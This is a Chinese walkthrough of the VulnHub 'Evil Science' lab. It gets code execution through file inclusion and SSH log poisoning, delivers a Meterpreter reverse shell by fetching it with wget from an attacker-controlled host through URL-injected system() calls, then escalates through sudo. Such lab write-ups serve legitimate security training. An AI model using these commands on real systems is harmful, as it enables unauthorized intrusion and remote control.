【vulnhub】The Ether: Evil Science靶机
创始人
2024-11-13 06:08:45

靶机安装

下载地址:https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/

运行环境:Vmware

信息收集

进行IP发现

nmap 192.168.93.0/24

进行端口扫描,开放了80和22端口

nmap -A 192.168.93.155 -p-

进行目录扫描

dirsearch -u http://192.168.93.155 -e *.php

网页访问IP网址

点击各处之后,发下在点击上面的ABOUT US之后,url里有着请求参数:/index.php?file=about.php

可能存在文件包含漏洞

拼接目录扫描出的目录,没有什么有用的信息,

对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破

标记之后,加入文件包含可能存在的文件的字典

/usr/local/apache2/logs/access_log  /logs/access_log  /etc/httpd/logs/access_log  /var/log/httpd/access_log /var/log/auth.log

发现有一个/var/log/auth.log目录存在重定向,打开响应包,里面是日志记录,并且是ssh的记录,应该是会把ssh操作记录到这里面,我们尝试利用ssh写入一句话木马,

利用ssh登录产生错误日志写入一句话木马

ssh ''@192.168.93.155

访问执行命令

获取shell

用msfvenom生成 shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.93.130 LPORT=1234 -f elf > shell.elf 

开启监听

#开启环境 msfconsole  use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set lhost 192.168.93.130 set lport 1234 run 

在下载的shell.elf文件下面开启web服务,进行远程下载

python3 -m http.server

利用前面的漏洞执行远程下载和运行,将下面的每条命令在网页里拼接在URL参数后面,回车执行就可以,继续下一条命令

/?file=/var/log/auth.log&d1no=system('wget+192.168.93.130:8000/shell.elf')%3b /?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b /?file=/var/log/auth.log&d1no=system('./shell.elf')%3b 

三条命令执行完之后,发现监听成功

提权

先将获取到的shell转变为交互式的shell

#进入shell环境 shell  python -c 'import pty;pty.spawn("/bin/bash")'

查询一下sudo提权

sudo -l

发现xxxlogauditorxxx.py 可以以 root 运行。

执行命令

sudo ./xxxlogauditorxxx.py /var/log/auth.log | whoami 

相关内容

热门资讯

裸辞做“一人公司”,我后悔了 去年这个时候,一位以色列程序员正在东南亚旅行。他顺手把一个在脑子里转了很久的想法做成了产品,一个让任...
南京建成国内首个Pre-6G试... 4月21日,2026全球6G技术与产业生态大会在南京开幕。全息互动技术展台前,一名远在北京的工作人员...
超梵求职受邀参加“2025抖音... 超梵求职受邀参加“2025抖音巨量引擎成人教育行业生态大会”,探讨分享优质内容传播,服务万千学员。 ...
摩托罗拉Razr 2026(R... IT之家 4 月 22 日消息,摩托罗拉宣布新一代 Razr 折叠手机将于 4 月 29 日在美国发...
库克卸任,特纳斯领航:苹果新纪... 苹果首席执行官蒂姆·库克将卸任,硬件工程主管约翰·特纳斯将接任,苹果公司今天宣布此事。 库克将在夏季...